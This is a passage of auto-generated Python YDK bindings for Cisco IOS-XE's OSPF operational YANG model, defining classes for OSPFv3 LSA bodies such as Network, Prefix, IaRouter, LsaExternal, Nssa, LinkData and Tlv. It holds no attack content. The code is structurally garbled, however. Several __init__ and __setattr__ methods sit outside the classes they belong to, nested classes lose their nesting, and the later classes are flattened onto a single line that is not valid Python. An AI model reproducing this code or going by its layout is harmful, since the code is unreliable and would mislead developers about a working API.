        self._children_name_map["nssa"] = "nssa"

        self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData()
        self.link_data.parent = self
        self._children_name_map["link_data"] = "link-data"

        self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix()
        self.ia_prefix.parent = self
        self._children_name_map["ia_prefix"] = "ia-prefix"
        self._segment_path = lambda: "lsa-body"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)


    class Network(Entity):
        """ OSPFv3 network ..
attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_net_options Network LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """

# Generated YANG binding metadata (module prefix / model revision).
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'

def __init__(self):
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__()

    self.yang_name = "network"
    self.yang_parent_name = "lsa-body"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([])
    self._leafs = OrderedDict([
        ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
        ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
    ])
    self.attached_router = []
    self.lsa_net_options = Bits()
    self._segment_path = lambda: "network"
    self._is_frozen = True

def __setattr__(self, name, value):
    # Restrict writes to the declared leaf names once the instance is frozen.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)


# NOTE(review): nested inside Ospfv3LsaVal.LsaBody (see super() path);
# preserve the original nesting depth when merging.
class Prefix(Entity):
    """
    OSPFv3 inter area prefix (config false).

    * metric (int, 0..4294967295): metric.
    * ia_prefix (str): inter-area prefix.
    * ia_prefix_options (str): inter-area prefix options.
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__()

        self.yang_name = "prefix"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
            ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
        ])
        self.metric = None
        self.ia_prefix = None
        self.ia_prefix_options = None
        self._segment_path = lambda: "prefix"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)


class IaRouter(Entity):
    """
    OSPFv3 inter area router (config false).

    * metric (int, 0..4294967295): metric.
    * destination_router_id (int, 0..4294967295): router ID of the router
      being described by the LSA.
    * lsa_ia_options (Bits): inter-area LSA options (Ospfv3LsaOptions).
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__()

        self.yang_name = "ia-router"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
            ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
        ])
        self.metric = None
        self.destination_router_id = None
        self.lsa_ia_options = Bits()
        self._segment_path = lambda: "ia-router"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)


class LsaExternal(Entity):
    """
    OSPFv3 LSA external (config false).

    * metric (int, 0..4294967295): metric.
    * flags: LSA flags (Flags child container).
    * referenced_ls_type (int, 0..65535): referenced Link State type.
    * external_prefix (str): prefix.
    * external_prefix_options (str): prefix options.
    * forwarding_address (str): forwarding address, IPv4 or IPv6 form.
    * external_route_tag (int, 0..4294967295): route tag.
    * referenced_link_state_id (int, 0..4294967295): referenced Link
      State ID.
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__()

        self.yang_name = "lsa-external"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
        ])
        self.metric = None
        self.referenced_ls_type = None
        self.external_prefix = None
        self.external_prefix_options = None
        self.forwarding_address = None
        self.external_route_tag = None
        self.referenced_link_state_id = None

        self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags()
        self.flags.parent = self
        self._children_name_map["flags"] = "flags"
        self._segment_path = lambda: "lsa-external"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)


    class Flags(Entity):
        """
        LSA Flags (config false).

        * e_flag (bool): when set, the metric specified is a Type 2
          external metric.
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__()

            self.yang_name = "flags"
            self.yang_parent_name = "lsa-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
            ])
            self.e_flag = None
            self._segment_path = lambda: "flags"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)


class Nssa(Entity):
    """ OSPFv3 NSSA ..
attribute:: lsa_nssa_external NSSA LSA **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal>` **config**\: False """

# Generated YANG binding metadata (module prefix / model revision).
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'

def __init__(self):
    # Nssa has no leafs of its own; it only wraps the lsa-nssa-external
    # child container.
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__()

    self.yang_name = "nssa"
    self.yang_parent_name = "lsa-body"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))])
    self._leafs = OrderedDict()

    self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal()
    self.lsa_nssa_external.parent = self
    self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
    self._segment_path = lambda: "nssa"
    self._is_frozen = True

def __setattr__(self, name, value):
    # No settable leafs; the empty list still enforces frozen-instance checks.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value)


# NOTE(review): nested inside Nssa (see super() path); preserve the original
# nesting depth when merging. Same leaf layout as LsaBody.LsaExternal.
class LsaNssaExternal(Entity):
    """
    NSSA LSA (config false).

    * metric (int, 0..4294967295): metric.
    * flags: LSA flags (Flags child container).
    * referenced_ls_type (int, 0..65535): referenced Link State type.
    * external_prefix (str): prefix.
    * external_prefix_options (str): prefix options.
    * forwarding_address (str): forwarding address, IPv4 or IPv6 form.
    * external_route_tag (int, 0..4294967295): route tag.
    * referenced_link_state_id (int, 0..4294967295): referenced Link
      State ID.
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__()

        self.yang_name = "lsa-nssa-external"
        self.yang_parent_name = "nssa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
        ])
        self.metric = None
        self.referenced_ls_type = None
        self.external_prefix = None
        self.external_prefix_options = None
        self.forwarding_address = None
        self.external_route_tag = None
        self.referenced_link_state_id = None

        self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags()
        self.flags.parent = self
        self._children_name_map["flags"] = "flags"
        self._segment_path = lambda: "lsa-nssa-external"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)


    class Flags(Entity):
        """
        LSA Flags (config false).

        * e_flag (bool): when set, the metric specified is a Type 2
          external metric.
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()

            self.yang_name = "flags"
            self.yang_parent_name = "lsa-nssa-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
            ])
            self.e_flag = None
            self._segment_path = lambda: "flags"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)


# NOTE(review): nested inside Ospfv3LsaVal.LsaBody (see super() path).
class LinkData(Entity):
    """
    OSPFv3 Link data (config false).

    * rtr_priority (int, 0..255): router priority of the interface.
    * link_local_interface_address (str): the originating router's
      link-local interface address on the link, IPv4 or IPv6 form.
    * num_of_prefixes (int, 0..4294967295): number of prefixes.
    * lsa_id_options (Bits): link data LSA options (Ospfv3LsaOptions).
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__()

        self.yang_name = "link-data"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
            ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
            ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
            ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
        ])
        self.rtr_priority = None
        self.link_local_interface_address = None
        self.num_of_prefixes = None
        self.lsa_id_options = Bits()
        self._segment_path = lambda: "link-data"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)


class IaPrefix(Entity):
    """ OSPFv3 Intra area prefixes .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_adv_router Referenced Advertising Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False ..
attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): """ OSPFv3 links .. attribute:: interface_id (key) Interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_interface_id (key) Neighbor interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_router_id (key) Neighbor router ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: metric Metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3PrefixList(Entity): """ OSPFv3 prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. 
attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__() self.yang_name = "ospfv3-prefix-list" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): """ OSPFv3 intra\-area prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. 
attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class MultiTopology(Entity): """ OSPF multi\-topology interface augmentation .. 
attribute:: name (key) One of the topology enabled on this interface **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__() self.yang_name = "multi-topology" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value) class Tlv(Entity): """ Link TLV .. attribute:: link_type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_id Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: local_if_ipv4_addr List of local interface IPv4 addresses **type**\: union of the below types: **type**\: list of str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: list of str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: local_remote_ipv4_addr List of remote interface IPv4 addresses **type**\: union of the below types: **type**\: list of str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: list of str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: te_metric TE metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: max_bandwidth Maximum bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. attribute:: max_reservable_bandwidth Maximum reservable bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. attribute:: unreserved_bandwidth Unrseerved bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. attribute:: admin_group Administrative group/Resource class/Color **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, self).__init__() self.yang_name = "tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])), ('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])), ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])), ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])), ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])), 
('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])), ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])), ]) self.link_type = None self.link_id = None self.local_if_ipv4_addr = [] self.local_remote_ipv4_addr = [] self.te_metric = None self.max_bandwidth = None self.max_reservable_bandwidth = None self.unreserved_bandwidth = None self.admin_group = None self._segment_path = lambda: "tlv" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value) class UnknownSubTlv(Entity): """ OSPFv2 Unknown sub TLV .. attribute:: type (key) TLV type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: length TLV length **type**\: int **range:** 0..65535 **config**\: False .. 
attribute:: value TLV value **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__() self.yang_name = "unknown-sub-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value) class AreaScopeLsa(Entity): """ List OSPF area scope LSA databases .. attribute:: lsa_type (key) LSA Type **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: adv_router (key) Advertising router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** 